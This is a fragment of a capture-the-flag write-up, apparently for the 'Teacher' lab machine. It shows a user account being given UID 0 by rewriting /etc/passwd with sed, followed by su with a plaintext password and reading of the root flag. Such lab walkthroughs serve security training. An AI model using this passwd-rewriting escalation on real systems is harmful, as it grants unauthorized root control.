giovanni@teacher:~/work$ cat /etc/passwd | grep giovanni giovanni:x:1000:1000:Giovanni,1337,,:/home/giovanni:/bin/bash giovanni@teacher:~$ sed 's/giovanni:x:1000:1000:Giovanni,1337,,:\/home\/giovanni:\/bin\/bash/giovanni:x:0:0:Giovanni,1337,,:\/home\/giovanni:\/bin\/bash/' /etc/passwd > /tmp/passwd giovanni@teacher:~$ cp /tmp/passwd /etc/passwd giovanni@teacher:~$ cat /etc/passwd | grep giovanni giovanni:x:0:0:Giovanni,1337,,:/home/giovanni:/bin/bash
Root flag
giovanni@teacher:~$ exit logout www-data@teacher:/var/www/html/moodle/question$ su - giovanni Password: expelled
root@teacher:~# whoami root root@teacher:~# cat /root/root.txt <ROOT_FLAG>
References
Daniel Simao 20:28, 16 February 2020 (EST)
